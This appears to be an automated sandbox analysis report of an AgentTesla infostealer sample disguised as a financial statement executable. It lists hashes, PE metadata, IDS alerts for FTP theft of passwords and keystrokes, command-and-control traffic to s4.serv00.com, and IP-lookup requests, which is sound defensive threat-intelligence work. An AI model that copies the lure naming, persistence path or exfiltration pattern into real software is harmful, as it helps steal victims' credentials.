                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4X................0..d............... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...4c... ...d.................. ..`.rsrc................f..............@..@.reloc...............l..............@..B........................H.......t...`................$..........................................j.((.....()....s....(*....*&.(+.....*".......*".(0....*Vs....(1...t.........*".(+....*.s6........*Vs6........(.........*.s6........*Vs6........sF........*F.~....(O....^...*6.~.....(P...*F.~....(O....^...*6.~.....(P...*F.~....(O....^...*6.~.....(P...*F.~....(O........*J.~..........(Q...*F.~....(O....^...*6.~.....(P...*F.~....(O........*J.~..........(Q...*R.(R...-..(S......*.*F.~....(O...t....*6.~.....(Q...

                                                C:\Users\user\AppData\Roaming\Adobe\adobe.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.480821743600628
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Statement of Account - USD 16,720.00.exe
                                                File size:486'912 bytes
                                                MD5:cf173ca1db13dfc7237fd33630926b65
                                                SHA1:783e42e20da75ea1a2fd7a02e3824f251f26cf4f
                                                SHA256:1b9d152c5cd6e2904ada0ca707dbd2bb089ac59f8b07723490552a000848cc54
                                                SHA512:31a7210e2ef813763225c39f5c42f00cd7899539755fd090e256ab17a16c88238e9a659bed9cf4bfd9f5bcb310fb850a6e2e04c41aaf1f2f8fd98db99fa8addc
                                                SSDEEP:6144:Y9yYMqdl+a/ZNntauGBOaYcR/uVc3fTlAoOjlrrhTFInd6Xcfg9UJU8:2dMqdl+YZNorUVcvWoOJFTWndm+
                                                TLSH:D6A4AE583BA008B5D53A89F5F8F5803D7A3079A225E2C82525CF1FDC7DCAB50899726F
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4X................0..d............... ........@.. ....................................@................................

                                                File Icon

                                                Icon Hash:00928e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x47832e
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x9FFD5834 [Thu Jan 21 21:42:12 2055 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x782d40x57.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x586.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x763340x764009cbabd01a398367b1340d08042982fd0False0.6754694932610994data7.494181501767098IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x7a0000x5860x6000e874ca99d069383826abad4e45e4f71False0.4127604166666667data4.0143412955081095IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x7c0000xc0x20053e20c5b5bbaeab7ffd53901fdb8269bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x7a0a00x2fcdata0.43455497382198954
                                                RT_MANIFEST0x7a39c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-12-31T14:01:58.492073+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549707213.189.52.18121TCP
                                                2024-12-31T14:01:59.039543+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549709213.189.52.18163775TCP
                                                2024-12-31T14:01:59.044751+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549709213.189.52.18163775TCP
                                                2024-12-31T14:02:12.444136+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549713213.189.52.18121TCP
                                                2024-12-31T14:02:13.007555+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549718213.189.52.18163475TCP
                                                2024-12-31T14:02:13.012652+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549718213.189.52.18163475TCP
                                                2024-12-31T14:02:20.618400+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.549745213.189.52.18121TCP
                                                2024-12-31T14:02:21.179731+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549756213.189.52.18163292TCP
                                                2024-12-31T14:02:21.188362+01001800009Joe Security MALWARE AgentTesla - FTP Exfil Passwords1192.168.2.549756213.189.52.18163292TCP
                                                2024-12-31T14:02:21.188362+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.549756213.189.52.18163292TCP
                                                2024-12-31T14:03:30.360786+01001800007Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs1192.168.2.549990213.189.52.18164485TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 31, 2024 14:01:54.757396936 CET49704443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:01:54.757438898 CET44349704104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:01:54.757503986 CET49704443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:01:54.768824100 CET49704443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:01:54.768838882 CET44349704104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:01:55.246445894 CET44349704104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:01:55.246572971 CET49704443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:01:55.249650955 CET49704443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:01:55.249659061 CET44349704104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:01:55.249875069 CET44349704104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:01:55.287910938 CET49704443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:01:55.331342936 CET44349704104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:01:55.396138906 CET44349704104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:01:55.396194935 CET44349704104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:01:55.396321058 CET49704443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:01:55.405819893 CET49704443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:01:56.682974100 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:56.687819958 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:56.687897921 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:57.269740105 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:57.270003080 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:57.274830103 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:57.459942102 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:57.460134983 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:57.464951992 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:57.718554020 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:57.718759060 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:57.723635912 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:57.908855915 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:57.915699959 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:57.920552969 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:58.105416059 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:58.105654001 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:58.110418081 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:58.295603037 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:58.295809031 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:58.300592899 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:58.486294985 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:58.486927986 CET4970963775192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:58.491914988 CET6377549709213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:58.492002964 CET4970963775192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:58.492073059 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:58.496848106 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:59.039180994 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:59.039542913 CET4970963775192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:59.039542913 CET4970963775192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:59.044404030 CET6377549709213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:59.044693947 CET6377549709213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:59.044750929 CET4970963775192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:59.089077950 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:01:59.230031013 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:01:59.276571035 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:08.942605019 CET49712443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:08.942647934 CET44349712104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:08.942723989 CET49712443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:08.946527958 CET49712443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:08.946546078 CET44349712104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:09.401612997 CET44349712104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:09.401798964 CET49712443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:09.403330088 CET49712443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:09.403340101 CET44349712104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:09.403676033 CET44349712104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:09.448533058 CET49712443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:09.450141907 CET49712443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:09.491372108 CET44349712104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:09.554346085 CET44349712104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:09.554476976 CET44349712104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:09.554949999 CET49712443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:09.557167053 CET49712443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:10.586541891 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:10.591447115 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:10.591520071 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:11.168958902 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:11.169184923 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:11.173952103 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:11.359651089 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:11.360601902 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:11.365446091 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:11.664518118 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:11.667134047 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:11.672036886 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:11.858036041 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:11.865643024 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:11.870492935 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:12.058001995 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:12.058142900 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:12.062849998 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:12.248311996 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:12.248429060 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:12.253264904 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:12.438653946 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:12.439155102 CET4971863475192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:12.443998098 CET6347549718213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:12.444072008 CET4971863475192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:12.444135904 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:12.448892117 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:13.007286072 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:13.007555008 CET4971863475192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:13.007607937 CET4971863475192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:13.012372017 CET6347549718213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:13.012604952 CET6347549718213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:13.012651920 CET4971863475192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:13.057790995 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:13.198127031 CET2149713213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:13.245312929 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:16.974569082 CET49732443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:16.974590063 CET44349732104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:16.974656105 CET49732443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:16.979429960 CET49732443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:16.979441881 CET44349732104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:17.480067968 CET44349732104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:17.480154037 CET49732443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:17.482645988 CET49732443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:17.482654095 CET44349732104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:17.482887030 CET44349732104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:17.526559114 CET49732443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:17.545104980 CET49732443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:17.587335110 CET44349732104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:17.653352976 CET44349732104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:17.653410912 CET44349732104.26.12.205192.168.2.5
                                                Dec 31, 2024 14:02:17.656279087 CET49732443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:17.662552118 CET49732443192.168.2.5104.26.12.205
                                                Dec 31, 2024 14:02:18.751844883 CET4971321192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:18.768769979 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:18.773612976 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:18.773669958 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:19.372648001 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:19.372910976 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:19.378017902 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:19.567356110 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:19.567485094 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:19.572237015 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:19.831259966 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:19.831506968 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:19.836388111 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:20.025906086 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:20.026046038 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:20.030853987 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:20.220060110 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:20.220176935 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:20.224976063 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:20.413980007 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:20.417009115 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:20.421792984 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:20.610661983 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:20.613274097 CET4975663292192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:20.618176937 CET6329249756213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:20.618277073 CET4975663292192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:20.618400097 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:20.623328924 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:21.171152115 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:21.179730892 CET4975663292192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:21.183358908 CET4975663292192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:21.184576035 CET6329249756213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:21.188291073 CET6329249756213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:21.188361883 CET4975663292192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:21.214138031 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:02:21.377569914 CET2149745213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:02:21.432797909 CET4974521192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:03:29.601514101 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:03:29.606372118 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:03:29.791431904 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:03:29.792387962 CET4999064485192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:03:29.797245026 CET6448549990213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:03:29.797324896 CET4999064485192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:03:29.800921917 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:03:29.805779934 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:03:30.355446100 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:03:30.355663061 CET4999064485192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:03:30.355735064 CET4999064485192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:03:30.360522032 CET6448549990213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:03:30.360728979 CET6448549990213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:03:30.360785961 CET4999064485192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:03:30.433381081 CET4970721192.168.2.5213.189.52.181
                                                Dec 31, 2024 14:03:30.547830105 CET2149707213.189.52.181192.168.2.5
                                                Dec 31, 2024 14:03:30.685317039 CET4970721192.168.2.5213.189.52.181

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 31, 2024 14:01:54.737750053 CET5218653192.168.2.51.1.1.1
                                                Dec 31, 2024 14:01:54.744622946 CET53521861.1.1.1192.168.2.5
                                                Dec 31, 2024 14:01:56.672291994 CET5340253192.168.2.51.1.1.1
                                                Dec 31, 2024 14:01:56.682233095 CET53534021.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Dec 31, 2024 14:01:54.737750053 CET192.168.2.51.1.1.10x263fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                Dec 31, 2024 14:01:56.672291994 CET192.168.2.51.1.1.10x23c4Standard query (0)s4.serv00.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Dec 31, 2024 14:01:54.744622946 CET1.1.1.1192.168.2.50x263fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                Dec 31, 2024 14:01:54.744622946 CET1.1.1.1192.168.2.50x263fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                Dec 31, 2024 14:01:54.744622946 CET1.1.1.1192.168.2.50x263fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                Dec 31, 2024 14:01:56.682233095 CET1.1.1.1192.168.2.50x23c4No error (0)s4.serv00.com213.189.52.181A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • api.ipify.org

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549704104.26.12.2054431288C:\Users\user\Desktop\Statement of Account - USD 16,720.00.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-31 13:01:55 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-12-31 13:01:55 UTC424INHTTP/1.1 200 OK
                                                Date: Tue, 31 Dec 2024 13:01:55 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8faa7604ef1042fd-EWR
                                                server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1561&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1749550&cwnd=248&unsent_bytes=0&cid=58348ebbd0706511&ts=159&x=0"
                                                2024-12-31 13:01:55 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                Data Ascii: 8.46.123.189


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549712104.26.12.2054437116C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                TimestampBytes transferredDirectionData
                                                2024-12-31 13:02:09 UTC155OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                Host: api.ipify.org
                                                Connection: Keep-Alive
                                                2024-12-31 13:02:09 UTC424INHTTP/1.1 200 OK
                                                Date: Tue, 31 Dec 2024 13:02:09 GMT
                                                Content-Type: text/plain
                                                Content-Length: 12
                                                Connection: close
                                                Vary: Origin
                                                CF-Cache-Status: DYNAMIC
                                                Server: cloudflare
                                                CF-RAY: 8faa765d69db176c-EWR
